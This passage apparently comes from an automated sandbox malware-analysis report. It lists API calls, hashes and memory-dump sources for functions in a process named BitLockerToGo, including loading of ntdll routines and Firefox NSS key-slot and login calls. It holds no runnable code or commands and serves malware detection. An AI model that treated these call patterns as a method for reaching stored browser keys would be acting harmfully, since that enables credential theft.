                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6C97F100: GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath), ref: 6C97F132
                                                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 6C9AF555
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6C9814B0: wcslen.API-MS-WIN-CRT-STRING-L1-1-0(6C981248,6C981248,?), ref: 6C9814C9
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6C9814B0: memcpy.VCRUNTIME140(?,6C981248,00000000,?,6C981248,?), ref: 6C9814EF
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6C97EEA0: memcpy.VCRUNTIME140(?,?,?), ref: 6C97EEE3
                                                                                                                                                                                                                                                                                                                    • CreateFileW.KERNEL32 ref: 6C9AF4FD
                                                                                                                                                                                                                                                                                                                    • GetFileInformationByHandle.KERNEL32(00000000), ref: 6C9AF523
                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2699721657.000000006C971000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C970000, based on PE: true
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2699486259.000000006C970000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2699838206.000000006C9ED000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2699872874.000000006C9FE000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700050064.000000006CA02000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c970000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: FileHandle$Informationmemcpy$AddressCloseCreateLibraryLoadProcwcslen
                                                                                                                                                                                                                                                                                                                    • String ID: \oleacc.dll
                                                                                                                                                                                                                                                                                                                    • API String ID: 2595878907-3839883404
                                                                                                                                                                                                                                                                                                                    • Opcode ID: 4e6e0c6b46425fb45881d34522e32c7a5abc066df34302b5310502d6c3193923
                                                                                                                                                                                                                                                                                                                    • Instruction ID: 5b878ce074c09641fffd6b32dc96c9f7893a7ccb1cce2b30a7e48d5e974b5121
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4e6e0c6b46425fb45881d34522e32c7a5abc066df34302b5310502d6c3193923
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 674180306097109FE720DFB9D884AAAB7F4AF9531CF501A1CF5A593650EB30D94A8B92
                                                                                                                                                                                                                                                                                                                    Function 6C9D74A0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 72COMMON
                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • SetLastError.KERNEL32(00000000), ref: 6C9D7526
                                                                                                                                                                                                                                                                                                                    • __Init_thread_footer.LIBCMT ref: 6C9D7566
                                                                                                                                                                                                                                                                                                                    • __Init_thread_footer.LIBCMT ref: 6C9D7597
                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2699721657.000000006C971000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C970000, based on PE: true
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2699486259.000000006C970000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2699838206.000000006C9ED000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2699872874.000000006C9FE000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700050064.000000006CA02000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c970000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: Init_thread_footer$ErrorLast
                                                                                                                                                                                                                                                                                                                    • String ID: UnmapViewOfFile2$kernel32.dll
                                                                                                                                                                                                                                                                                                                    • API String ID: 3217676052-1401603581
                                                                                                                                                                                                                                                                                                                    • Opcode ID: a4e1599a03f405299416d11b076d4cc6a689205258d753d1075f4a5cbf3d9111
                                                                                                                                                                                                                                                                                                                    • Instruction ID: 0446d15c2fd5860b5d612bcb2848c88621fc5ea749117a7e1aa060ae81f5e7d7
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a4e1599a03f405299416d11b076d4cc6a689205258d753d1075f4a5cbf3d9111
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C5214831705901ABCF048FE9D854E4973B6EB97739F128129D421A7F40CB30F807CA96
                                                                                                                                                                                                                                                                                                                    Function 6CA80DC0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 51stringCOMMON
                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • strrchr.VCRUNTIME140(00000000,0000005C,00000000,00000000,00000000,?,6CA80BDE), ref: 6CA80DCB
                                                                                                                                                                                                                                                                                                                    • strrchr.VCRUNTIME140(00000000,0000005C,?,6CA80BDE), ref: 6CA80DEA
                                                                                                                                                                                                                                                                                                                    • _stricmp.API-MS-WIN-CRT-STRING-L1-1-0(00000001,00000001,?,?,?,6CA80BDE), ref: 6CA80DFC
                                                                                                                                                                                                                                                                                                                    • PR_LogPrint.NSS3(%s incr => %d (find lib),?,?,?,?,?,?,?,6CA80BDE), ref: 6CA80E32
                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                    • %s incr => %d (find lib), xrefs: 6CA80E2D
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2700157450.000000006CA11000.00000020.00000001.01000000.00000011.sdmp, Offset: 6CA10000, based on PE: true
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700099356.000000006CA10000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700306655.000000006CBAF000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700364892.000000006CBEE000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700409040.000000006CBEF000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700443101.000000006CBF0000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700476958.000000006CBF5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6ca10000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: strrchr$Print_stricmp
                                                                                                                                                                                                                                                                                                                    • String ID: %s incr => %d (find lib)
                                                                                                                                                                                                                                                                                                                    • API String ID: 97259331-2309350800
                                                                                                                                                                                                                                                                                                                    • Opcode ID: dc074e138a55c7e3e3215bb24185b21ed30ba1a8f1dab95a91e97e2cce7471ff
                                                                                                                                                                                                                                                                                                                    • Instruction ID: c2ab2f7539226c7d82b44ef8b4d864265e8adc65b756335c69ea7dba70a89335
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: dc074e138a55c7e3e3215bb24185b21ed30ba1a8f1dab95a91e97e2cce7471ff
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C0012472B02290AFE7209F64EC45E1B73BCEB45A09B09482DE949D3B41E761FC5986E1
                                                                                                                                                                                                                                                                                                                    Function 6C9DC410 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 19libraryloaderCOMMON
                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • LoadLibraryW.KERNEL32(ntdll.dll,?,6C9DC0E9), ref: 6C9DC418
                                                                                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,NtQueryVirtualMemory), ref: 6C9DC437
                                                                                                                                                                                                                                                                                                                    • FreeLibrary.KERNEL32(?,6C9DC0E9), ref: 6C9DC44C
                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2699721657.000000006C971000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C970000, based on PE: true
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2699486259.000000006C970000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2699838206.000000006C9ED000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2699872874.000000006C9FE000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700050064.000000006CA02000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c970000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: Library$AddressFreeLoadProc
                                                                                                                                                                                                                                                                                                                    • String ID: NtQueryVirtualMemory$ntdll.dll
                                                                                                                                                                                                                                                                                                                    • API String ID: 145871493-2623246514
                                                                                                                                                                                                                                                                                                                    • Opcode ID: ddacb2d47dbd599036f10fe6a5331ad0250b6e7330a5dab0a26e951080f3d4ef
                                                                                                                                                                                                                                                                                                                    • Instruction ID: c683a1da5e6d19abbd55e2148e0031f074243a4e981e693b1657a234ff8e2fc7
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ddacb2d47dbd599036f10fe6a5331ad0250b6e7330a5dab0a26e951080f3d4ef
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D8E0B6716193099BDF01BF71EA187117FF8A74A30DF248156AA36D2B40EBB4E001CB90
                                                                                                                                                                                                                                                                                                                    Function 6C9D75B0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 19libraryloaderCOMMON
                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • LoadLibraryW.KERNEL32(ntdll.dll,?,6C9D748B,?), ref: 6C9D75B8
                                                                                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,RtlNtStatusToDosError), ref: 6C9D75D7
                                                                                                                                                                                                                                                                                                                    • FreeLibrary.KERNEL32(?,6C9D748B,?), ref: 6C9D75EC
                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2699721657.000000006C971000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C970000, based on PE: true
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2699486259.000000006C970000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2699838206.000000006C9ED000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2699872874.000000006C9FE000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700050064.000000006CA02000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c970000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: Library$AddressFreeLoadProc
                                                                                                                                                                                                                                                                                                                    • String ID: RtlNtStatusToDosError$ntdll.dll
                                                                                                                                                                                                                                                                                                                    • API String ID: 145871493-3641475894
                                                                                                                                                                                                                                                                                                                    • Opcode ID: 63f6b1111fc5ad13b54434997e426d4f25512809f7b3b4266cf39578f1a347b2
                                                                                                                                                                                                                                                                                                                    • Instruction ID: 0c35a341e3e7453b7de4ba8e1c7e4c0cfee8e2219792ae0bd23bfe076624bb46
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 63f6b1111fc5ad13b54434997e426d4f25512809f7b3b4266cf39578f1a347b2
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 06E0B671658301ABEF006FA2E848701FEFCEB4671CF309426A925D1A00EBB5D24ACF55
                                                                                                                                                                                                                                                                                                                    Function 6C974DE0 Relevance: 7.6, APIs: 5, Instructions: 133stringCOMMON
                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • ?DoubleToAscii@DoubleToStringConverter@double_conversion@@SAXNW4DtoaMode@12@HPADHPA_NPAH3@Z.MOZGLUE ref: 6C974E5A
                                                                                                                                                                                                                                                                                                                    • ?CreateDecimalRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHHPAVStringBuilder@2@@Z.MOZGLUE(?,?,?,?,?), ref: 6C974E97
                                                                                                                                                                                                                                                                                                                    • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C974EE9
                                                                                                                                                                                                                                                                                                                    • memcpy.VCRUNTIME140(?,?,00000000), ref: 6C974F02
                                                                                                                                                                                                                                                                                                                    • ?CreateExponentialRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHPAVStringBuilder@2@@Z.MOZGLUE(?,?,?,?), ref: 6C974F1E
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2699721657.000000006C971000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C970000, based on PE: true
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2699486259.000000006C970000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2699838206.000000006C9ED000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2699872874.000000006C9FE000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700050064.000000006CA02000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c970000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: String$Double$Converter@double_conversion@@$Builder@2@@CreateRepresentation@$Ascii@DecimalDtoaExponentialMode@12@memcpystrlen
                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                    • API String ID: 713647276-0
                                                                                                                                                                                                                                                                                                                    • Opcode ID: c1cfe315889919c67a692bcc9415c56987e36085de7d28dcf9abdfce3768a91b
                                                                                                                                                                                                                                                                                                                    • Instruction ID: 89c060df157899a1d5e082f2126d7903237f0d8f5741186aa1c601dddcec26e2
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c1cfe315889919c67a692bcc9415c56987e36085de7d28dcf9abdfce3768a91b
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8641BF71609705DFC725CF29C88095BB7E8BF99354F108A2DF4A587A42DB30E954CFA2
                                                                                                                                                                                                                                                                                                                    Function 6CA8EDE0 Relevance: 7.6, APIs: 5, Instructions: 97COMMON
                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • TlsGetValue.KERNEL32 ref: 6CA8EDFD
                                                                                                                                                                                                                                                                                                                    • calloc.MOZGLUE(00000001,00000000), ref: 6CA8EE64
                                                                                                                                                                                                                                                                                                                    • PR_SetError.NSS3(FFFFE8AC,00000000), ref: 6CA8EECC
                                                                                                                                                                                                                                                                                                                    • memcpy.VCRUNTIME140(00000000,?,?), ref: 6CA8EEEB
                                                                                                                                                                                                                                                                                                                    • free.MOZGLUE(?), ref: 6CA8EEF6
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2700157450.000000006CA11000.00000020.00000001.01000000.00000011.sdmp, Offset: 6CA10000, based on PE: true
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700099356.000000006CA10000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700306655.000000006CBAF000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700364892.000000006CBEE000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700409040.000000006CBEF000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700443101.000000006CBF0000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700476958.000000006CBF5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6ca10000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: ErrorValuecallocfreememcpy
                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                    • API String ID: 3833505462-0
                                                                                                                                                                                                                                                                                                                    • Opcode ID: ed38839f53aedc0045a3e9d8259034026721605a9c5c267bd7c026aca7880908
                                                                                                                                                                                                                                                                                                                    • Instruction ID: e7ca632e64b5089453ff9499ea1ed0843f11949181bb4bc80aa26fe9ba1b787d
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ed38839f53aedc0045a3e9d8259034026721605a9c5c267bd7c026aca7880908
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2C31F575A01250EBEB209F2CDC44B667BB4FB46744F180529E86A87B50D731E894CBE1
                                                                                                                                                                                                                                                                                                                    Function 6C97B4C0 Relevance: 7.6, APIs: 5, Instructions: 84COMMON
                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 6C97B532
                                                                                                                                                                                                                                                                                                                    • moz_xmalloc.MOZGLUE(?), ref: 6C97B55B
                                                                                                                                                                                                                                                                                                                    • memset.VCRUNTIME140(00000000,00000000,?), ref: 6C97B56B
                                                                                                                                                                                                                                                                                                                    • wcsncpy_s.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?), ref: 6C97B57E
                                                                                                                                                                                                                                                                                                                    • free.MOZGLUE(00000000), ref: 6C97B58F
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2699721657.000000006C971000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C970000, based on PE: true
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2699486259.000000006C970000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2699838206.000000006C9ED000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2699872874.000000006C9FE000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700050064.000000006CA02000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c970000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: HandleModulefreememsetmoz_xmallocwcsncpy_s
                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                    • API String ID: 4244350000-0
                                                                                                                                                                                                                                                                                                                    • Opcode ID: ec27258fdf4cc306c1d97a9d67ccfa67e2757f837df384f212dd5eaf462ee230
                                                                                                                                                                                                                                                                                                                    • Instruction ID: b987d3a34324cb4fdd0df279113a6fbb8dfc7d476a1a9b2a359600f211c06eb7
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ec27258fdf4cc306c1d97a9d67ccfa67e2757f837df384f212dd5eaf462ee230
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1F210571A052059BDB108F68CC40BAEBBB9FF96308F284129E818DB341E736D911C7A0
                                                                                                                                                                                                                                                                                                                    Function 6CA9AD90 Relevance: 7.6, APIs: 5, Instructions: 72memoryCOMMON
                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • PORT_ArenaMark_Util.NSS3(00000000,?,6CA93FFF,00000000,?,?,?,?,?,6CA91A1C,00000000,00000000), ref: 6CA9ADA7
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CAF14C0: TlsGetValue.KERNEL32 ref: 6CAF14E0
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CAF14C0: EnterCriticalSection.KERNEL32 ref: 6CAF14F5
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CAF14C0: PR_Unlock.NSS3 ref: 6CAF150D
                                                                                                                                                                                                                                                                                                                    • PORT_ArenaAlloc_Util.NSS3(00000000,00000020,?,?,6CA93FFF,00000000,?,?,?,?,?,6CA91A1C,00000000,00000000), ref: 6CA9ADB4
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CAF10C0: TlsGetValue.KERNEL32(?,6CA98802,00000000,00000008,?,6CA8EF74,00000000), ref: 6CAF10F3
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CAF10C0: EnterCriticalSection.KERNEL32(?,?,6CA98802,00000000,00000008,?,6CA8EF74,00000000), ref: 6CAF110C
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CAF10C0: PL_ArenaAllocate.NSS3(?,?,?,6CA98802,00000000,00000008,?,6CA8EF74,00000000), ref: 6CAF1141
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CAF10C0: PR_Unlock.NSS3(?,?,?,6CA98802,00000000,00000008,?,6CA8EF74,00000000), ref: 6CAF1182
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CAF10C0: TlsGetValue.KERNEL32(?,6CA98802,00000000,00000008,?,6CA8EF74,00000000), ref: 6CAF119C
                                                                                                                                                                                                                                                                                                                    • SECITEM_CopyItem_Util.NSS3(00000000,?,6CA93FFF,?,?,?,?,6CA93FFF,00000000,?,?,?,?,?,6CA91A1C,00000000), ref: 6CA9ADD5
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CAEFB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6CAE8D2D,?,00000000,?), ref: 6CAEFB85
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CAEFB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6CAEFBB1
                                                                                                                                                                                                                                                                                                                    • SEC_QuickDERDecodeItem_Util.NSS3(00000000,00000000,6CBB94B0,?,?,?,?,?,?,?,?,6CA93FFF,00000000,?), ref: 6CA9ADEC
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CAEB030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6CBC18D0,?), ref: 6CAEB095
                                                                                                                                                                                                                                                                                                                    • PR_SetError.NSS3(FFFFE022,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,6CA93FFF), ref: 6CA9AE3C
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2700157450.000000006CA11000.00000020.00000001.01000000.00000011.sdmp, Offset: 6CA10000, based on PE: true
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700099356.000000006CA10000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700306655.000000006CBAF000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700364892.000000006CBEE000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700409040.000000006CBEF000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700443101.000000006CBF0000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700476958.000000006CBF5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6ca10000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: Util$Arena$Value$Alloc_CriticalEnterErrorItem_SectionUnlock$AllocateCopyDecodeMark_Quickmemcpy
                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                    • API String ID: 2372449006-0
                                                                                                                                                                                                                                                                                                                    • Opcode ID: 0a5ef628d982680f90e9d1b92b97c65e72ca4af04d2bdb5148e06ce94d06173f
                                                                                                                                                                                                                                                                                                                    • Instruction ID: dcb4448c97959110e2314e2c67c1ecc9666001a4e46a6ba2370b76fd08863b42
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0a5ef628d982680f90e9d1b92b97c65e72ca4af04d2bdb5148e06ce94d06173f
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DF117B71E103285BE7109B649C42BBF73F8DF9524CF044229FC5996741FB20EA9D82E2
                                                                                                                                                                                                                                                                                                                    Function 6CAB8E80 Relevance: 7.6, APIs: 5, Instructions: 71COMMON
                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • PK11_GetInternalKeySlot.NSS3(?,?,?,6CAD2E62,?,?,?,?,?,?,?,00000000,?,?,?,6CAA4F1C), ref: 6CAB8EA2
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CADF820: free.MOZGLUE(6A1B7500,2404110F,?,?), ref: 6CADF854
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CADF820: free.MOZGLUE(FFD3F9E8,2404110F,?,?), ref: 6CADF868
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CADF820: DeleteCriticalSection.KERNEL32(04C4841B,2404110F,?,?), ref: 6CADF882
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CADF820: free.MOZGLUE(04C483FF,?,?), ref: 6CADF889
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CADF820: DeleteCriticalSection.KERNEL32(CCCCCCDF,2404110F,?,?), ref: 6CADF8A4
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CADF820: free.MOZGLUE(CCCCCCC3,?,?), ref: 6CADF8AB
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CADF820: DeleteCriticalSection.KERNEL32(280F1108,2404110F,?,?), ref: 6CADF8C9
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CADF820: free.MOZGLUE(280F10EC,?,?), ref: 6CADF8D0
                                                                                                                                                                                                                                                                                                                    • PK11_IsLoggedIn.NSS3(?,?,?,6CAD2E62,?,?,?,?,?,?,?,00000000,?,?,?,6CAA4F1C), ref: 6CAB8EC3
                                                                                                                                                                                                                                                                                                                    • TlsGetValue.KERNEL32(?,?,?,6CAD2E62,?,?,?,?,?,?,?,00000000,?,?,?,6CAA4F1C), ref: 6CAB8EDC
                                                                                                                                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(?,?,?,?,6CAD2E62,?,?,?,?,?,?,?,00000000,?,?), ref: 6CAB8EF1
                                                                                                                                                                                                                                                                                                                    • PR_Unlock.NSS3 ref: 6CAB8F20
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
